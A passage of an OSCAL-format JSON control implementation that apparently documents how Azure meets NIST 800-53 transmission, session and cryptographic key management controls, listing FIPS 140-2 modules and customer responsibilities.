_x000D_ _x000D_"}],"responsibilities":[{"uuid":"2eca0659-030b-4c2a-ad6a-602febeefd0e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-031"}],"description":"The customer is responsible for employing boundary protection mechanisms to separate customer-defined resources supporting organizational missions and/or business functions.","provided-uuid":"26c0d304-e3f7-4778-9e2c-c3594394fdc8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"df7291b8-cffe-4b30-9ebf-e879c68aa3dd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-8","statements":[{"uuid":"2d142d04-79a5-49b2-8f54-c2a0e777d5dd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-8_smt","by-components":[{"uuid":"081bce7d-dc96-458c-ba1a-193031b92a4b","export":{"provided":[{"uuid":"1c49842f-3b01-499a-b04d-4fd81ef0f607","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-032"}],"description":"Azure services always use secure transport such as TLS or HTTPS. Encryption in transport is addressed by the transport protocol. Azure implements the transmission integrity and confidentiality control by ensuring that cryptography is implemented through a hybrid model. 
The following is a high-level list of the symmetric and asymmetric keys used for encrypting and protecting confidentiality of data._x000D_ _x000D_ * AES for symmetric encryption/decryption_x000D_ * 128-bit or better symmetric keys_x000D_ * RSA for asymmetric encryption/decryption and signatures_x000D_ * 2048-bit or better RSA keys_x000D_ * SHA-256 or better (SHA-384, SHA-512) for hashing and message-authentication codes_x000D_ _x000D_ Azure implements cryptography in numerous ways. Communications between the Azure service and the Azure Management Portal are configured to accept FIPS 140-2 validated encryption. Azure enforces communications between Azure internal components to be protected with self-signed SSL certificates. Hardware Security Modules used by Azure Key Vault employ FIPS 140-2 validated encryption. Azure requires that data is classified according to sensitivity (LBI, MBI, or HBI), and the owner of the data is responsible for following the Asset Classification Standard and Asset Protection Standard for encrypting data according to its classification._x000D_ _x000D_ Secrets are communicated through the Azure Management Portal and API over a secure TLS 1.2 channel. Both the SMAPI and the Azure Management Portal are only accessible over HTTPS. Service certificates, RDP passwords, and Storage Account Keys (SAKs) are stored in an encrypted format._x000D_ _x000D_ Azure utilizes FIPS 140-2 Cryptographic Module Verification Program (CMVP) validated modules for areas requiring encryption. HMAC is a keyed hash function for message authentication (RFC 2104). It makes use of an underlying hash function (MD5, SHA-1 or SHA-2) and a secret key of a specified length. 
The strength of an HMAC relies on the strength of the underlying hash function, and the length of the secret._x000D_ _x000D_ * A SHA-2 hash is required for new code._x000D_ * SHA-1 is permissible in existing code only for backwards compatibility and after review by the Crypto Board._x000D_ * MAC3DES is permissible for managed code only since this is the only FIPS-compliant keyed hash algorithm for .NET currently available. A Crypto Board review is required for such usage._x000D_ * Other hash functions, including MD2, MD4 or MD5 are not permitted, and must be replaced in existing code._x000D_ _x000D_ All approved keyed hash algorithms are members of the HMAC family. HMAC is a mechanism for constructing a keyed hash algorithm using an underlying hash algorithm. For projects utilizing keyed hash algorithms, the following hash functions must be used within the HMAC mechanism._x000D_ _x000D_ Note that hash function agility (the ability to switch to another hash function without patching the code) is part of the \"Implement Crypto Agility\" requirement. No new code should use the MD4 or MD5 hash algorithms as hash collisions have been demonstrated for both algorithms. SHA1 is being deprecated. Continued use of SHA-1 is permissible in existing code only for backwards compatibility and, as described below, for new code running on certain down-level platforms. A SHA-2 hash is currently the only recommended hash function. The SHA-2 hash functions are available in managed code, and in unmanaged code targeting Windows Server 2003 SP1 and later versions of Windows._x000D_ _x000D_ For new managed code, use of a SHA-2 hash function is required. SHA-1 is permissible in existing code only for backwards compatibility. Such usage requires Crypto Board review. All other hash functions, including MD2, MD4 or MD5 must not be used, and must be replaced in existing code. 
For unmanaged code, use of a SHA-2 hash function is required._x000D_ _x000D_ In order to access the Azure environment via network connection, a user must authenticate with their Azure domain credentials. Azure provides access through smart-card-enabled Jumpboxes and SSL VPN servers when establishing access connections into the Azure environments. Users must have a valid smart card, and valid Azure domain accounts to establish a remote access session. Jumpboxes and SSL VPN servers are configured to use the FIPS 140-2 encryption setting, specifically TLS 1.2._x000D_ _x000D_ Azure uses FIPS 140-2 validated cryptography to support compliance with federal laws, executive orders, directives, policies, regulations, standards, and guidance. FIPS 140-2 encryption is required for digital media physically transported, electronically transmitted over Azure via TLS, and for Windows-based authentication and SSH authentication to network devices._x000D_ _x000D_ Encrypted data may transit across the Azure environment, but the network devices are agnostic as to the type of data being transmitted. Azure relies on extensive physical security to protect all the end-to-end communications inside datacenters._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9862f9bd-d919-44e7-ad73-cbe9674f8e0a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-032"}],"description":"The customer is responsible for configuring all customer-deployed resources to communicate through FIPS 140-2 validated encryption to protect the confidentiality and integrity of the information being transmitted. Customers are responsible for configuring their web browsers, mobile devices, etc., to enable communications through FIPS 140-2 validated encryption. 
Customers who enforce FDCC/USGCB settings will achieve FIPS 140-2 encryption for data transmitted to Microsoft Azure, and between their enablers and the Azure web services interface; strong encryption with FIPS-approved ciphers is still possible if workstations are not operating in FIPS mode.","provided-uuid":"1c49842f-3b01-499a-b04d-4fd81ef0f607"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"44568f58-4c2e-4f19-9fd1-ce42ae8e156c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-8.1","statements":[{"uuid":"dabeb3cd-5aa6-4646-92eb-70ee447b9dfb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-8.1_smt","by-components":[{"uuid":"a07fa792-d1f0-47b9-a8bd-b7ae478c256d","export":{"provided":[{"uuid":"cde8e3f0-50aa-4e68-b2d6-55b7013b4327","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-033"}],"description":"Azure uses encryption to prevent unauthorized disclosure of information and detect changes to information during transmission. 
Specifically, Azure provides FIPS 140-2 compliant ciphers that include integrity validation for customer connections, interconnected system connections, and remote access connections._x000D_ _x000D_ For connections to customers, Azure is configured to negotiate FIPS compliant TLS protocols with supported client browsers, though non-FIPS compliant protocols are supported for legacy browser support._x000D_ _x000D_ Connections within the accreditation boundary occur within Azure facilities. Since Azure owns and controls access to these connections, they do not require FIPS 140-2 encryption. However, service-to-service communications occur over TLS 1.2, and internal communication between Azure datacenters is transmitted over FIPS 140-2 compliant AES 256 link encryptors to ensure the confidentiality of data._x000D_ _x000D_"}],"responsibilities":[{"uuid":"da323327-14cb-41e6-bc46-f61ea60b2abb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-033"}],"description":"The customer is responsible for protecting information in transit by using cryptographic mechanisms to prevent the unauthorized disclosure of and/or detecting changes to customer-controlled information during transmission.","provided-uuid":"cde8e3f0-50aa-4e68-b2d6-55b7013b4327"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"90b4622a-e030-429b-8f4f-9be059d016e9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-10","statements":[{"uuid":"ef862fb2-1f0b-4dc4-90d8-c859787fc33c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-10_smt","by-components":[{"uuid":"238f037e-7bee-44eb-b3dc-7673de0e81a5","export":{"provided":[{"uuid":"f44d00f2-d1a8-4f17-9bfd-ef8d5e77e16c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-034"}],"description":"Azure Secure Admin Workstations (SAWs) require reauthentication after at most ten (10) minutes of user inactivity. These are the only method of access to the environment. The SAW VPN terminates inactive sessions after three hundred sixty (360) minutes of inactivity, and the non-SAW VPN terminates inactive sessions after sixty (60) minutes of inactivity._x000D_ _x000D_ The logical access process to Azure resources is controlled using Remote Desktop Protocol (RDP), Secure Shell (SSH) and the SSL VPN. Non-interactive sessions are not permitted through Azure._x000D_ _x000D_ Servers_x000D_ _x000D_ RDP and SSH idle timeout inherit the settings of the target server. 
Azure servers are configured to terminate idle RDP sessions after one (1) hour of inactivity and to end a disconnected RDP session after one (1) day, and to terminate SSH sessions after fifteen (15) minutes of inactivity._x000D_ _x000D_ Network Devices_x000D_ _x000D_ SSH idle timeout inherits the settings of the target network device. Azure network devices are configured to terminate inactive sessions after sixty (60) minutes._x000D_ _x000D_ Azure implements user sessions that terminate after sixty (60) minutes of inactivity on the Pulse VPN. The risks associated with a sixty (60) minute disconnect are mitigated through using multifactor authentication (MFA) with FIPS 140-2 level 3 validated smart card tokens for all in-band management and by logging security events related to account activity._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7d1c63a1-dfe6-4096-9cdb-3b5067c5b8b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-034"}],"description":"The customer is responsible for implementing a network disconnect for customer-deployed resources at the end of a communication session or after a customer-defined time period of inactivity.","provided-uuid":"f44d00f2-d1a8-4f17-9bfd-ef8d5e77e16c"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c3a72bf4-d415-463b-a52a-1adc223fbbc0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-12","statements":[{"uuid":"a2077075-7f56-420f-9e63-a90e75bcbdf9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-12_smt","by-components":[{"uuid":"59feb47f-8d68-4cd4-a9ae-aa98a5c0cb04","export":{"provided":[{"uuid":"7f06a7f2-00cd-4f62-a79e-afadf5d4c085","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-035"}],"description":"When cryptographic capabilities are employed to protect the confidentiality, integrity, or availability of data within Azure, the algorithms and cryptographic modules are FIPS 140-2 compliant. Rather than validate individual services, components, or products, Microsoft chooses to validate only the underlying cryptographic modules. Subsequently, Azure services are built to rely on the FIPS 140 validated cryptographic modules of the underlying operating systems, including the Cryptographic API: Next Generation (CNG) and Cryptographic API (CAPI) for Windows and Kernel Crypto API for Linux. Azure uses the documented APIs for each of the modules to access various cryptographic services. 
For additional information on how cryptographic modules are employed in Microsoft products, see the links below:_x000D_ _x000D_ <https://docs.microsoft.com/en-us/windows/security/threat-protection/fips-140-validation>_x000D_ <https://docs.microsoft.com/en-us/microsoft-365/compliance/offering-fips-140-2>_x000D_ _x000D_ When utilizing cryptographic mechanisms for securing data or services, Azure adheres to Microsoft's Key Management Standard for establishing and managing keys. The Key Management Standard applies to all environments managed by Azure, including labs, production, and preproduction. Equipment used to generate, store and archive keys is physically and logically protected. Keys are classified and destroyed in accordance with the requirements set forth in the Asset Classification Standard and Asset Protection Standard documents. To reduce the likelihood of compromise, activation and deactivation dates for keys are defined so that the keys can only be used for a limited period. The Key Management Standard mandates the following Key Management Procedures:_x000D_ _x000D_ * Standard Operating Procedures_x000D_ * Secure methods_x000D_ * Storing Keys_x000D_ * Distributing Keys_x000D_ * Archiving Keys_x000D_ * Key Destruction_x000D_ * Changing or Updating Keys_x000D_ * Compromised Keys_x000D_ * Recovering Keys_x000D_ * Revoking Keys_x000D_ * Logging and Auditing_x000D_ * Key Distribution and access control_x000D_ _x000D_ Azure implements cryptographic key management through the use of approved secret stores, including Azure Key Vault and dSMS. 
Azure ensures that both secret stores contain the approved trust anchors, including certificates with visibility external to Azure and certificates related to the internal operations of services._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c936a2c5-e37d-4bd2-b478-b3759abb36b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-035"}],"description":"The customer is responsible for managing cryptographic keys used within customer-deployed resources in accordance with customer-defined requirements for key generation, distribution, storage, access, and destruction. Government user entities will ensure that personal computing devices (client systems) are configured to request FIPS 140-2 encryption ciphers and protocols for all network sessions.","provided-uuid":"7f06a7f2-00cd-4f62-a79e-afadf5d4c085"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f67c9a46-62f2-4eb8-85f4-2178d88144b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-12.1","statements":[{"uuid":"8bc4c436-2e06-4985-b400-4f5bb98239f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-12.1_smt","by-components":[{"uuid":"bf0e849a-bc76-4b8e-875b-fec8f1217fdc","export":{"provided":[{"uuid":"a8a12fd1-4efa-4c74-bc86-ec69a0b3bf8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-036"}],"description":"Azure service teams store their 
Storage Account Keys within an approved secret management store, which tracks and monitors access to secrets. The approved secret management stores, Key Vault and dSMS, are backed up regularly and provide the ability to restore data that has been accidentally deleted. This ensures that the Storage Account Key is never lost. Azure Storage also has a soft delete option, which preserves a key if accidentally or maliciously deleted._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7d08f938-d69e-4f74-8eb9-eb8f8c3dd1eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-036"}],"description":"The customer is responsible for maintaining the availability of information in the event of the loss of cryptographic keys by users. Customers store cryptographic keys using Key Vault, which provides the ability to restore data that has accidentally been deleted.","provided-uuid":"a8a12fd1-4efa-4c74-bc86-ec69a0b3bf8e"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"eb3adcd0-29f9-42bc-a717-c0d3f36c3ee5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-13","statements":[{"uuid":"1cc5a1a9-aae4-4379-b971-141d05a1264f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-037"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-13_smt.a","by-components":[{"uuid":"33ee2ff4-9d36-48e9-8764-59bf83553744","export":{"provided":[{"uuid":"74747e58-54fe-48c4-b346-d16028c7a636","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-037"}],"description":"Azure uses cryptography for the protection of controlled unclassified information, provision and implementation of digital signatures, logical network separation, and random number and hash generation."}],"responsibilities":[{"uuid":"a25483c9-8165-4e2c-90ce-174948c5651b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-037"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for determining organization-defined cryptographic uses.","provided-uuid":"74747e58-54fe-48c4-b346-d16028c7a636"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d49385ae-4a35-4d02-b59f-e09542e58845","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-038"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-13_smt.b","by-components":[{"uuid":"e1685615-45f0-4e07-b1ec-b72ff04f230d","export":{"provided":[{"uuid":"85eaccaa-72bc-4d9f-bbd4-6b36fba345cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-038"}],"description":"Encryption mechanisms and techniques used within Azure follow the requirements and restrictions outlined in the Microsoft Key Management Standard, Microsoft Operational Encryption Standard, Azure Cryptographic Controls Standard Operating Procedure. The Microsoft Key Management Standard applies to the operation of all Microsoft's online services residing within Azure utilizing cryptographic mechanisms for securing data or services. This standard applies to all environments managed by Azure, including labs, production, and pre-production. Azure implements cryptography through encryption mechanisms and techniques following the requirements outlined in the Cryptographic Controls of the Microsoft Security Program Policy (MSPP). Federal Information Processing Standards (FIPS) 140-2 validated cryptographic modules are used to support compliance with federal laws, executive orders, directives, policies, regulations, and standards. 
Additional information can be found at the link below: <https://docs.microsoft.com/en-us/windows/security/threat-protection/fips-140-validation> Specific encryption modules being used and the certificates for the server baselines can be found at <https://csrc.nist.gov/groups/STM/cmvp/documents/140-1/1401vend.htm> and are identified below, using the Certificate Number and Module Name. Servers Azure leverages the cryptographic capabilities that are directly a part of the Windows and Linux operating systems for certificates and authentication mechanisms such as Kerberos v5. These cryptographic modules have been certified by NIST as being Federal Information Processing Standards (FIPS) 140-2 compliant. * 3651 - Secure Kernel Code Integrity * 3644 - Code Integrity * 3615 - Windows OS Loader * 3527 - Kernel Mode Cryptographic Primitives Library * 3513 - Secure Kernel Code Integrity (skci.dll) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 3510 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 3502 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 3501 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 3487 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 
3480 - Windows OS Loader * 3197 - Cryptographic Primitives Library * 3196 - Kernel Mode Cryptographic Primitives Library * 3195 - Code Integrity * 3194 - Windows OS Loader * 3096 - Secure Kernel Code Integrity * 3095 - Cryptographic Primitives Library * 3094 - Kernel Mode Cryptographic Primitives Library * 3093 - Code Integrity * 3092 - BitLocker Dump Filter * 3091 - Windows Resume * 3090 - Windows OS Loader * 3089 - Boot Manager * 2938 - Secure Kernel Code Integrity (skci.dll) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 2937 - Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2936 - Kernel Mode Cryptographic Primitives Library (cng.sys) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2935 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2934 - BitLocker® Dump Filter (dumpfve.sys) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2933 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 
2016 * 2932 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2931 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2357 - Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2 * 2356 - Kernel Mode Cryptographic Primitives Library (cng.sys) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2 * 2355 - Code Integrity (ci.dll) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2 * 2354 - BitLocker® Dump Filter (dumpfve.sys) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series * 2353 - BitLocker® Windows Resume (winresume) 
in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series * 2352 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2 * 2351 - Boot Manager in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2 * 3651 - Secure Kernel Code Integrity * 3644 - Code Integrity * 3615 - Windows OS Loader * 3197 - Cryptographic Primitives Library * 3196 - Kernel Mode Cryptographic Primitives Library * 3092 - BitLocker Dump Filter * 3089 - Boot Manager The Linux servers employ NIST-certified Federal Information Processing Standards (FIPS) 140-2 compliant cryptographic modules. 
* 3647 - Ubuntu 18.04 Kernel Crypto API Cryptographic Module * 3622 - Ubuntu 18.04 OpenSSL Cryptographic Module * 3633 - Ubuntu 18.04 OpenSSH Client Cryptographic Module * 3632 - Ubuntu 18.04 OpenSSH Server Cryptographic Module * 3648 - Ubuntu 18.04 Strongswan Cryptographic Module * 3683 - Ubuntu 18.04 Azure Kernel Crypto API Cryptographic Module * 2962 - Ubuntu Kernel Crypto API Cryptographic Module * 2888 - Ubuntu OpenSSL Cryptographic Module * 2907 - Ubuntu OpenSSH Client Cryptographic Module * 2906 - Ubuntu OpenSSH Server Cryptographic Module * 2978 - Ubuntu Strongswan Cryptographic Module * 4277 - CBL-Mariner 1.0 Kernel Crypto API * 4496 - CBL-Mariner 2.0 OpenSSL Cryptographic Module * 4292 - Ubuntu 20.04 OpenSSL Cryptographic Module * 4126 - Ubuntu 20.04 Azure Kernel Crypto API Cryptographic Module * 4046 - Ubuntu 20.04 Strongswan Cryptographic Module * 3966 - Ubuntu 20.04 OpenSSL Cryptographic Module * 3928 - Ubuntu 20.04 Kernel Crypto API Cryptographic Module * 3902 - Ubuntu 20.04 Libgcrypt Cryptographic Module * 3939 - Red Hat Enterprise Linux 7 Kernel Crypto API Cryptographic Module * 3725 - Ubuntu 16.04 OpenSSL Cryptographic Module * 3724 - Ubuntu 16.04 Kernel Crypto API Cryptographic Module * 3980 - Ubuntu 18.04 OpenSSL Cryptographic Module * 3876 - Red Hat Enterprise Linux 7 OpenSSL Cryptographic Module * 3538 - Red Hat Enterprise Linux OpenSSL Cryptographic Module * 3016 - Red Hat Enterprise Linux OpenSSL Cryptographic Module * 4642 - Red Hat Enterprise Linux 8 OpenSSL Cryptographic Module * 4458 - Red Hat Enterprise Linux 8 NSS Cryptographic Module * 4438 - Red Hat Enterprise Linux 8 libgcrypt Cryptographic Module * 4434 - Red Hat Enterprise Linux 8 Kernel Crypto API Cryptographic Module * 4428 - Red Hat Enterprise Linux 8 GnuTLS Cryptographic Module * 4413 - Red Hat Enterprise Linux 8 NSS Cryptographic Module * 4397 - Red Hat Enterprise Linux 8 libgcrypt Cryptographic Module * 4384 - Red Hat Enterprise Linux 8 libgcrypt Cryptographic 
Module * 4272 - Red Hat Enterprise Linux 8 GnuTLS Cryptographic Module * 4271 - Red Hat Enterprise Linux 8 OpenSSL Cryptographic Module * 4254 - Red Hat Enterprise Linux 8 Kernel Crypto API Cryptographic Module * 3784 - Red Hat Enterprise Linux 8 libgcrypt Cryptographic Module * 3956 - Red Hat Enterprise Linux 8 GnuTLS Cryptographic Module * 3946 - Red Hat Enterprise Linux 8 NSS Cryptographic Module * 3918 - Red Hat Enterprise Linux 8 Kernel Crypto API Cryptographic Module * 3842 - Red Hat Enterprise Linux 8 OpenSSL Cryptographic Module * 3839 - Red Hat Enterprise Linux 8 NSS Cryptographic Module * 3813 - Red Hat Enterprise Linux 8 GnuTLS Cryptographic Module * 3794 - Red Hat Enterprise Linux 8 Kernel Crypto API Cryptographic Module * 3781 - Red Hat Enterprise Linux 8 OpenSSL Cryptographic Module * 4282 - OpenSSL FIPS Provider Network Devices Encrypted data may transit across the Azure network, but the network devices are agnostic as to the type of data being transmitted. Network devices use the following cryptographic modules: * 2984 - Cisco FIPS Object Module * 2505 - Cisco FIPS Object Module * 3429 - EOS MACsec Alpha Hybrid Module * 3420 - EOS MACsec Bravo Hybrid Module * 2909 - Arista EOS Crypto Module v1.0 * 3621 - Juniper Networks MX80, MX104, MX240, MX480, MX960 3D Universal Edge Routers with RE-S-X6-64G/RE-S-X6-128G Routing Engine and MIC-MACSEC-20GE MACSec Card * 2921 - Juniper Networks SRX1400, SRX3400, and SRX3600 Services Gateways * 3629 - F5® Device Cryptographic 